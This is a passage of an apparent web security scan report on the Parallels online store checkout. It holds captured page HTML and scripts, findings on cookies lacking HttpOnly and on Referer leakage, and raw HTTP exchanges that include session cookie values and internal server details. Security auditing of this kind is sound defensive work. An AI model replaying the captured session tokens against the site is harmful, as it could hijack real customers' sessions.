var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>










































<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutAddressPaymentInfoPage';

</script>













   







<script type="text/javascript">





var fc_track = "billing";













































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154202626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154202626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">






/* <form name="analyticsForm" method="post" action="/DRHM/store">
   <input type="hidden" name="Action" value="DisplayShoppingCartPage"/>
   <input type="hidden" name="SiteID" value="para"/>
   <input type="hidden" name="Locale" value="en_US"/>
   <input type="hidden" name="Form" value="com.digitalriver.template.form.ShoppingCartForm"/>
   <input type="hidden" name="CallingPageID" value="ThreePgCheckoutAddressPaymentInfoPage"/>
   <input type="hidden" name="Env" value="BASE"/> */
omnProductName='';





omnProductName+=';[1]SP-SMBPanel: Parallels Small Business Panel for Windows - 1 User,'.replace(/[^A-Za-z0-9 ,;:.]/g, '');

omnPageName='Checkout: Address';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scCheckout'
omnProducts=omnProductName;
/* </form> */




</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->






   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->


<script src="https://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>



<!-- end retargeting pixel -->













</body>
</html>
2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://store.parallels.com
Path:   /store/para/en_US/AddItemsToRequisition/productID.222100500

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /store/para/en_US/AddItemsToRequisition/productID.222100500 HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fstore.parallels.com%2Fstore%2Fpara%2Fen_US%2FAddItemsToRequisition%2FproductID.222100500%3Fresid%3D__RESID__%26rests%3D1299874690638&t=commerce&p=globalcommerce&p1=para&p2=24863180226&p3=newsession
Content-Type: text/plain
Set-Cookie: ORA_WX_SESSION="10.1.2.144:1028-0#0"; path=/
Set-Cookie: JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; expires=Sun, 11-Mar-2012 02:07:22 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=98416068249,0)
Content-Length: 0
Date: Fri, 11 Mar 2011 20:18:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Set-Cookie: BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; path=/

3. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

3.1. http://store.parallels.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://store.parallels.com/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; mbox=check#true#1299874809|session#1299874748891-562918#1299876609; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.2.10.1299874733; aspcms_sid=c268913546380a1096a063587ad8f09a; s_cc=true; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874772187-New; s_sq=swsdev%3D%2526pid%253DCheckout%25253A%252520Shopping%252520Cart%2526pidt%253D1%2526oid%253Dhttp%25253A//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=98416097860,0)
Date: Fri, 11 Mar 2011 20:18:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 41872




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutShoppingCartPage"-->






<!-- REQUEST ID: TIME=1299866217516:NODE=c1a6104:THREAD=37; ESI Fragment - CREATED: Fri Mar 11 11:56:57 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Shopping Cart</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutShoppingCartPage_contentBody -->
<script>
optrial.pageName = 'ThreePgCheckoutShoppingCartPage';

// Portfolio: GC-para
// Subject: ThreePgCheckoutShoppingCartPage
(function(){var _o=ptomodule;_o.U="https://ssl.pto.digitalriver.com/by/trial/612/p/threepgcheckoutshoppingcartpage./15/content.js";
_o.ST="script";_o.SA={"type":"text/javascript"};_o.B();_o.R(1000,null,null,null);})();
</script>
<!-- End of OT_ThreePgCheckoutShoppingCartPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874718760:NODE=c1a6104:THREAD=71 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutShoppingCartPage_contentBody">























<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutShoppingCartPage, Generated: Tue Mar 08 16:04:09 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" class="dr_Content" id="dr_ThreePgCheckoutShoppingCart">
<h1>Shopping Cart</h1>
<div id="dr_currencySelector">
<form method="get" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<p>
<strong>Select Currency:</strong>
<select name="currency" onChange="q=false;this.form.submit();">
<option selected="selected">USD</option>
<option>AED</option>
<option>ARS</option>
<option>AUD</option>
<option>BGN</option>
<option>BRL</option>
<option>CAD</option>
<option>CHF</option>
<option>CLP</option>
<option>CNY</option>
<option>CZK</option>
<option>DKK</option>
<option>EEK</option>
<option>EGP</option>
<option>EUR</option>
<option>GBP</option>
<option>HKD</option>
<option>HRK</option>
<option>IDR</option>
<option>ILS</option>
<option>INR</option>
<option>ISK</option>
<option>JPY</option>
<option>KRW</option>
<option>LTL</option>
<option>LVL</option>
<option>MXN</option>
<option>MYR</option>
<option>NOK</option>
<option>NZD</option>
<option>PLN</option>
<option>RUB</option>
<option>SAR</option>
<option>SEK</option>
<option>SGD</option>
<option>THB</option>
<option>TRY</option>
<option>TWD</option>
<option>UAH</option>
<option>ZAR</option>
</select>
<noscript>
<input type="submit" class="dr_button" value="update"/>
</noscript>
</p>
</form>
</div>
<form method="post" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.ShoppingCartForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
